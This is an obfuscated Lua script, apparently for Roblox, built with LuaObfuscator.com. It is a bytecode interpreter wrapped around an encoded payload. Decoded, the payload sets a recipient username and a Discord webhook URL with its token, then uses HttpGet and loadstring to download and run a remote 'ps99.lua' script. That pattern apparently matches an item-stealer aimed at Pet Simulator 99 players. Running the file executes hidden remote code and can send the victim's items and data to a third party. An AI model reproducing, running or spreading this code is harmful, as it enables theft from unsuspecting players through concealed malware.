--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v88=0;while true do if (v88==0) then v19=v0(v3(v30,1,1));return "";end end else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v30,16));if v19 then local v132=v5(v90,v19);v19=nil;return v132;else return v90;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v91=0 -0 ;local v92;while true do if (v91==(0 -0)) then v92=(v31/(2^(v32-(1 -(0 -0)))))%((4 -2)^(((v33-(620 -((1620 -(68 + 997)) + 64))) -(v32-(932 -((2127 -(226 + 1044)) + 74)))) + (569 -(367 + 201)))) ;return v92-(v92%(928 -((931 -717) + 713))) ;end end else local v93=0 + 0 ;local v94;while true do if (v93==0) then v94=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v94 + v94))>=v94) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=117 -(32 + (157 -72)) ;local v36;local v37;while true do if (v35==0) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) + (350 -(87 + 263)) ;v35=1 + 0 ;end if (v35==(958 -(892 + 65))) then return (v37 * (610 -354)) + v36 ;end end end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==((132 + 49) -(67 + 113))) then return (v42 * (12302277 + (4475936 -(915 + 82)))) + (v41 * ((455603 -294702) -95365)) + (v40 * (189 + 67)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (955 -(802 + 150)) );v18=v18 + (10 -6) ;v38=1 -0 ;end end end local function v24() local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==1) then v46=1 -0 ;v47=(v20(v45,1188 -(1069 + 118) ,45 -(910 -(261 + 624)) ) * ((3 -1)^(6 + 26))) + v44 ;v43=(4 -1) -1 ;end if (v43==(0 + 0)) then v44=v23();v45=v23();v43=792 -(368 + 423) ;end if (v43==((31 -22) -6)) then if (v48==(1080 -(1020 + 60))) then if (v47==(18 -(10 + 8))) then return v49 * (0 -0) ;else v48=443 -(416 + (885 -(814 + 45))) ;v46=0 -(1423 -(630 + 793)) ;end elseif (v48==(879 + 1168)) then return ((v47==(0 -0)) and (v49 * ((439 -((491 -346) + 293))/(430 -((108 -64) + 386))))) or (v49 * NaN) ;end return v8(v49,v48-(2509 -(998 + 488)) ) * (v46 + (v47/((1 + 1 + 0)^52))) ;end if (v43==(2 + 0)) then v48=v20(v45,793 -(201 + 571) ,1169 -(116 + 1022) );v49=((v20(v45,(629 -496) -101 )==1) and  -(1 + 0)) or (3 -(1 + 1)) ;v43=3;end end end local function v25(v50) local v51;if  not v50 then local v95=0 + 0 ;while true do if (v95==(0 -0)) then v50=v23();if (v50==((2107 -1341) -(745 + 21))) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(1748 -(760 + 987)) );v18=v18 + v50 ;local v52={};for v69=1 + 0 , #v51 do v52[v69]=v2(v1(v3(v51,v69,v69)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v96,v97,v98,v99,v100,v101,v102,v103) local v96=(function() return 0 -0 ;end)();local v97=(function() return;end)();local v99=(function() return;end)();while true do if (v96~=0) then else local v125=(function() return 0 + 0 ;end)();local v126=(function() return;end)();while true do if (v125==(574 -(507 + 67))) then v126=(function() return 1749 -(1013 + 736) ;end)();while true do if (v126==(0 + 0)) then v97=(function() return v98();end)();v99=(function() return nil;end)();v126=(function() return 1;end)();end if ((1 -0)~=v126) then else v96=(function() return  #"]";end)();break;end end break;end end end if (v96~= #"}") then else if (v97== #"/") then v99=(function() return v98()~=0 ;end)();elseif (v97==(2 + 0)) then v99=(function() return v100();end)();elseif (v97~= #"91(") then else v99=(function() return v101();end)();end v102[v103]=(function() return v99;end)();break;end end return v96,v97,v98,v99,v100,v101,v102,v103;end;end)();local v54=(function() return function(v104,v105,v106,v107,v108,v109,v110,v111,v112) local v113=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if (v113==(2 -1)) then local v128=(function() return 1581 -(1535 + 46) ;end)();while true do if (v128~=(0 + 0)) then else local v133=(function() return 0 -0 ;end)();while true do if ((560 -(306 + 254))~=v133) then else while true do if (v104~=0) then else v105=(function() return v106();end)();if (v107(v105, #"<", #"|")~=(867 -(550 + 317))) then else local v177=(function() return 0 + 0 ;end)();local v178=(function() return;end)();local v179=(function() return;end)();local v180=(function() return;end)();while true do if (v177~=(0 -0)) then else local v190=(function() return 0;end)();while true do if (v190==(0 -0)) then v178=(function() return v107(v105,2, #"xxx");end)();v179=(function() return v107(v105, #".com",8 -2 );end)();v190=(function() return 2 -1 ;end)();end if (1==v190) then v177=(function() return 2 -1 ;end)();break;end end end if (v177==1) then v180=(function() return {v108(),v108(),nil,nil};end)();if (v178==(285 -(134 + 151))) then local v192=(function() return 1665 -(970 + 695) ;end)();local v193=(function() return;end)();while true do if (v192==0) then v193=(function() return 0 -0 ;end)();while true do if (v193~=0) then else v180[ #"19("]=(function() return v108();end)();v180[ #"asd1"]=(function() return v108();end)();break;end end break;end end elseif (v178== #"{") then v180[ #"19("]=(function() return v109();end)();elseif (v178==(1992 -(582 + 1408))) then v180[ #"xxx"]=(function() return v109() -((1 + 1)^16) ;end)();elseif (v178== #"nil") then local v201=(function() return 0;end)();while true do if (v201~=(1456 -(282 + 1174))) then else v180[ #"-19"]=(function() return v109() -((813 -(569 + 242))^(55 -39)) ;end)();v180[ #"xnxx"]=(function() return v108();end)();break;end end end v177=(function() return 2 -0 ;end)();end if (v177==(11 -8)) then if (v107(v179, #"asd", #"asd")== #"{") then v180[ #"http"]=(function() return v110[v180[ #"0313"]];end)();end v111[v112]=(function() return v180;end)();break;end if (v177==(1826 -(1195 + 629))) then if (v107(v179, #"~", #" ")~= #":") then else v180[2 -0 ]=(function() return v110[v180[2]];end)();end if (v107(v179,243 -(187 + 54) ,2)== #"[") then v180[ #"asd"]=(function() return v110[v180[ #"19("]];end)();end v177=(function() return 783 -(162 + 618) ;end)();end end end break;end end return v104,v105,v106,v107,v108,v109,v110,v111,v112;end end end end end if (v113~=0) then else local v129=(function() return 700 -(271 + 429) ;end)();while true do if (1~=v129) then else v113=(function() return 1 + 0 ;end)();break;end if ((1500 -(1408 + 92))==v129) then v104=(function() return 0 + 0 ;end)();v105=(function() return nil;end)();v129=(function() return 1 -0 ;end)();end end end end end;end)();local v55=(function() return function(v114,v115,v116) local v117=(function() return 0 + 0 ;end)();local v118=(function() return;end)();while true do if ((0 -0)~=v117) then else v118=(function() return 0 + 0 ;end)();while true do if (v118==(0 + 0)) then local v134=(function() return 1636 -(1373 + 263) ;end)();while true do if (v134==(1000 -(451 + 549))) then v114[v115-#"|" ]=(function() return v116();end)();return v114,v115,v116;end end end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v71= #"[",v60 do FlatIdent_4CC24,Type,v21,Cons,v24,v25,v61,v71=(function() return v53(FlatIdent_4CC24,Type,v21,Cons,v24,v25,v61,v71);end)();end v59[ #"91("]=(function() return v21();end)();for v72= #"{",v23() do FlatIdent_2BD95,Descriptor,v21,v20,v22,v23,v61,v56,v72=(function() return v54(FlatIdent_2BD95,Descriptor,v21,v20,v22,v23,v61,v56,v72);end)();end for v73= #"/",v23() do v57,v73,v28=(function() return v55(v57,v73,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1 + 0 ];local v67=v63[(2429 -(260 + 1638)) -(406 + 123) ];local v68=v63[(2212 -(382 + 58)) -(1749 + 20) ];return function(...) local v74=v66;local v75=v67;local v76=v68;local v77=v27;local v78=1 + 0 ;local v79= -(1 + 0);local v80={};local v81={...};local v82=v12("#",...) -(3 -2) ;local v83={};local v84={};for v119=0,v82 do if ((v119>=v76) or (1899<917)) then v80[v119-v76 ]=v81[v119 + 1 + 0 + 0 ];else v84[v119]=v81[v119 + (2 -1) ];end end local v85=(v82-v76) + (1146 -(466 + 679)) ;local v86;local v87;while true do local v120=0 -0 ;while true do if (v120==(753 -(239 + 514))) then v86=v74[v78];v87=v86[1 + 0 ];v120=(2748 -1418) -(797 + (1581 -1049)) ;end if ((v120==(2 -(1206 -(902 + 303)))) or (4312<=876)) then if (v87<=(4 + 5)) then if ((2232<=2596) and (v87<=((4180 -2276) -(106 + (4320 -2526))))) then if (v87<=(1203 -(33 + 340 + 829))) then if ((2095<3686) and (v87>((1690 -(1121 + 569)) + 0))) then v84[v86[1 + (215 -(22 + 192)) ]]=v65[v86[8 -5 ]];else local v138=v86[5 -(686 -(483 + 200)) ];local v139,v140=v77(v84[v138](v13(v84,v138 + (115 -(4 + (1573 -(1404 + 59)))) ,v86[587 -(57 + (1442 -915)) ])));v79=(v140 + v138) -(1428 -(41 + 1386)) ;local v141=(137 -34) -(17 + 86) ;for v154=v138,v79 do v141=v141 + 1 + 0 ;v84[v154]=v139[v141];end end elseif (v87<=(3 -1)) then local v142=v86[5 -3 ];local v143,v144=v77(v84[v142](v13(v84,v142 + 1 ,v86[169 -(122 + 44) ])));v79=(v144 + v142) -(766 -(468 + 297)) ;local v145=216 -(42 + 174) ;for v157=v142,v79 do local v158=0 -0 ;while true do if ((0 -0)==v158) then v145=v145 + 1 + 0 ;v84[v157]=v143[v145];break;end end end elseif (v87==(1 + (564 -(334 + 228)))) then do return;end else v84[v86[3 -1 ]]=v86[68 -(30 + 35) ];end elseif (v87<=(18 -(40 -28))) then if (v87==(4 + 1)) then if (v84[v86[1259 -(1043 + 214) ]]==v86[15 -11 ]) then v78=v78 + ((2811 -1598) -(323 + 889)) ;else v78=v86[7 -4 ];end else v84[v86[1935 -(565 + (2480 -1112)) ]]();end elseif (v87<=(26 -19)) then if (v84[v86[582 -(361 + 219) ]]==v86[324 -(53 + 267) ]) then v78=v78 + (1 -0) ;else v78=v86[1 + 2 ];end elseif ((v87>8) or (1595>=4474)) then v84[v86[415 -(5 + 10 + (634 -(141 + 95))) ]]=v86[985 -(18 + 0 + 964) ];else local v165=0 -0 ;local v166;local v167;while true do if ((304 -(244 + (154 -94)))==v165) then v166=v86[(16 -9) -5 ];v167=v84[v86[2 + 1 + 0 ]];v165=1002 -(938 + 63) ;end if (v165==(1 + 0)) then v84[v166 + (851 -(20 + 830)) ]=v167;v84[v166]=v167[v86[4 + (0 -0) ]];break;end end end elseif (v87<=(140 -(116 + 10))) then if ((v87<=(1 + 10)) or (4619<2882)) then if ((v87==(1148 -(782 + 356))) or (294>=4831)) then v78=v86[741 -(542 + 196) ];else local v147=(0 + 0) -0 ;local v148;while true do if ((2029<=3084) and (v147==(0 + 0))) then v148=v86[2 + 0 ];v84[v148]=v84[v148](v13(v84,v148 + 1 + 0 ,v79));break;end end end elseif ((v87<=(31 -(10 + 9))) or (2037==2420)) then v78=v86[1878 -(157 + 1718) ];elseif ((4458>3904) and (v87==(33 -20))) then v65[v86[1554 -(1126 + 425) ]]=v84[v86[407 -(118 + 287) ]];else local v170=v86[1020 -(697 + 321) ];local v171=v84[v86[11 -8 ]];v84[v170 + (1122 -(118 + 1003)) ]=v171;v84[v170]=v171[v86[11 -7 ]];end elseif ((436>=123) and (v87<=(393 -(142 + 235)))) then if ((500<1816) and (v87==(68 -53))) then v65[v86[1 + 2 ]]=v84[v86[5 -3 ]];else do return;end end elseif (v87<=(1244 -(322 + 905))) then v84[v86[613 -(602 + 9) ]]=v65[v86[(1677 -485) -(449 + 740) ]];elseif (v87>(995 -(553 + 251 + 173))) then v84[v86[949 -(245 + 702) ]]();else local v175=v86[(169 -(92 + 71)) -4 ];v84[v175]=v84[v175](v13(v84,v175 + ((1 + 0) -0) ,v79));end v78=v78 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A616368656D7A686573746F6B69792F782F6D61696E2F70732O392E6C756103083O00557365726E616D65030C3O00686173696C7669753139383203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323733312O36372O393834332O38353137392F4E4B396D49526279726C364D344869315F495075496E524E5441467A676A74704D416474546E4D3233356A6C52546B4C65727541542D6943704A38485F7832363835534A00143O0012043O00013O0026053O000B0001000200040C3O000B0001001211000100033O001211000200043O002008000200020005001204000400066O000200044O001200013O00022O001300010001000100040C3O001300010026053O00010001000100040C3O00010001001204000100083O00120F000100073O0012040001000A3O00120F000100093O0012043O00023O00040C3O000100012O00103O00017O00",v9(),...);
